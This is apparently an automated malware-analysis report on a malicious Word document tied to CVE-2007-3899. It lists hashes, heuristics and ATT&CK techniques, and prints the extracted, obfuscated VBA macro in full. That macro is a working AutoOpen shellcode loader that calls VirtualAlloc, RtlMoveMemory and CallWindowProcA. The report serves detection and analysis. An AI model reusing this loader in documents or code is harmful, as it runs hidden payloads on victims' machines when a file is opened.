Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 f49a3797cb597609…

MALICIOUS

Office (OLE)

Size: 205.5 KB
Created: 2016-08-15 12:01:00
Authoring application: Microsoft Office Word
First seen: 2018-10-07
MD5: dbb376f0c4884c592985cfa257d77f72
SHA-1: b4d195e58a6a3bf2a659a80bdccc64d038e8a33d
SHA-256: f49a3797cb597609ed41941ecae441cc8e44f2f549921b29cc3e990b2f03591f
Risk Score: 128

Malware Insights

MITRE ATT&CK
T1203 Exploitation for Client Execution
T1059.005 Command and Scripting Interpreter: Visual Basic

The sample is a malicious Microsoft Word document that leverages the CVE-2007-3899 vulnerability. This vulnerability allows for memory corruption, which is then used to execute arbitrary code, as indicated by the VirtualAlloc API call. The presence of an AutoOpen macro further supports the execution of malicious code upon opening the document.

Heuristics (5)

  • CVE-2007-3899 — Microsoft Word malformed string memory corruption (severity: critical; tag: CVE likely; id: CVE_2007_3899)
    Word OLE document has the MS07-060 malformed-string exploit shape: a Word 97-family FIB points to a malformed DOP/string-table region with an abnormal INT_MAX run, inflated text counters, and exploit payload or Mdropper.Z campaign evidence.
  • Reference to VirtualAlloc API (severity: medium; id: SC_STR_VIRTUALALLOC)
    Reference to VirtualAlloc API
  • Legacy WordBasic auto-exec macro marker (severity: medium; id: OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • VBA macros detected (severity: medium; 1 related finding; id: OLE_VBA_MACROS)
    Document contains VBA macro code
  • AutoOpen macro (severity: low; id: OLE_VBA_AUTOOPEN)
    AutoOpen macro
    Matched lines in script:
    Sub AutoOpen()
    #If Win64 Then

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 4887 bytes
SHA-256: 5c8cc20be26920e5ed9df757ed3f1e9bc52356c27050bb72253a6b342f5b0e75
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "billionth"
Attribute VB_Base = "0{65FD4CCB-2882-4F75-8FBE-35ACD8E7F162}{ECC71634-AEB4-4CE3-90B3-D8104B8212AF}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{B5A6F9A0-2069-4DF9-80ED-1083063A27C2}{4C1A4ED9-C27B-4116-A6DD-80CE9D65D1EC}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
#If Win64 Then
Private Declare PtrSafe Function maison Lib "kernel32" Alias "VirtualAlloc" (ByVal lpaddr As LongPtr, ByVal dwSize As LongPtr, ByVal flAllocationType As LongPtr, ByVal flProtect As LongPtr) As LongPtr
Private Declare PtrSafe Sub talapoin Lib "ntdll" Alias "RtlMoveMemory" (pDst As Any, pSrc As Any, ByVal ByteLen As LongPtr)
Private Declare PtrSafe Function malay Lib "kernel32" Alias "CreateEventA" (lpEventAttributes As Any,bManualReset As LongPtr,bInitialState As LongPtr,lpName As String)
Private Declare PtrSafe Function hairbrush Lib "user32" Alias "CallWindowProcA" (lpPrevWndFunc As LongPtr, hWnd As Any, Msg As Any, wParam As Any, lParam As Any) As LongPtr
Private Declare PtrSafe Function viviparous Lib "user32" Alias "EndDialog" (ByVal hDlg As LongPtr,nResult As LongPtr) As LongPtr
Private Declare PtrSafe Function functus Lib "kernel32" Alias "GetPriorityClass" (hProcess As LongPtr) As LongPtr
Private Declare PtrSafe Function headwaters Lib "user32" Alias "GetDlgItem" (ByVal hDlg As LongPtr, nIDDlgItem As LongPtr) As LongPtr

#Else
Private Declare Function maison Lib "kernel32" Alias "VirtualAlloc" (ByVal lpaddr As Long, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As Long
Private Declare Sub talapoin Lib "ntdll" Alias "RtlMoveMemory" (pDst As Any, pSrc As Any, ByVal ByteLen As Long)
Private Declare Function twentythird Lib "user32" Alias "EndDialog" (ByVal hDlg As Long, nResult As Long) As Long
Private Declare Function chopin Lib "kernel32" Alias "CreateEventA" (lpEventAttributes As Any, bManualReset As Long, bInitialState As Long, lpName As String)
Private Declare Function tost Lib "user32" Alias "GetDlgItem" (ByVal hDlg As Long, nIDDlgItem As Long) As Long
Private Declare Function hairbrush Lib "user32" Alias "CallWindowProcA" (lpPrevWndFunc As Long, hWnd As Any, Msg As Any, wParam As Any, lParam As Any) As Long
Private Declare Function unselected Lib "kernel32" Alias "GetPriorityClass" (hProcess As Long) As Long

#End If
Sub trac()
    Dim blnTrackChangesOn As Boolean
    blnTrackChangesOn = ActiveDocument.TrackRevisions
    ActiveDocument.TrackRevisions = False
    ActiveDocument.TrackRevisions = blnTrackChangesOn
End Sub

Sub exmoor()
Dim combat As Variant
Dim nekton As Variant
apartments = billionth.choline
produced = maria.comparative(apartments)
subtilin = 88
colonialist = 80
If subtilin + colonialist < 88 Then
subtilin = "as" + StrReverse("itec") + Left("cismaged", 4)
kentish = Left("acassuring", 2) & "arine"
Else
colonialist = 68
End If

bonesetter = "detrain"
nontropical = "barleysugar"
#If Win64 Then
Dim indifference As LongPtr
#Else
Dim indifference As Long
#End If
osier = 0
indifference = maison(osier, 4574, &H1000, &H40)
heronry = "scimitar"
idaho = "eloquent"
Dim atilt As String
excise = "meliorism"
atilt = ActiveDocument.FullName
ambrosial = 115 + 52 - 162
Select Case ambrosial
Case 1 To 10
harms = "insured"
halter = "bearings"
Case 11
congou = "deliberative"
Case 14
acetylenic = "enjoyable"
pervert = "lollipop"
End Select

Dim townsman() As Byte
townsman = produced
faulkner = LCase("eth") & LCase("nOgRaphy")
talapoin ByVal indifference, townsman(0), UBound(townsman) + 1
setose = "interfering"
#If Win64 Then
Dim vermifuge As Variant
exulcerate = "cebuan"
bandwidth = "scombridae"
scurfy = "relative"
disburdened = 576
#ElseIf Win32 Then
disburdened = 2214
#End If
Dim caller As String
Dim gnathostome As String
lome = hairbrush(ByVal indifference + disburdened, atilt, 0, 0, 0)
avesta = 125 + 84 - 204
Select Case avesta
Case 1 To 11
locum = "monodrame"
filing = "damaging"
copse = "basketball"
Case 12
cuisinecordon = "fitter"
Case 14
oreortyx = "turns"
End Select

End Sub

Sub AutoOpen()
#If Win64 Then
exmoor
#ElseIf Win32 Then
busker = "avolation"
exmoor
#Else
#End If
End Sub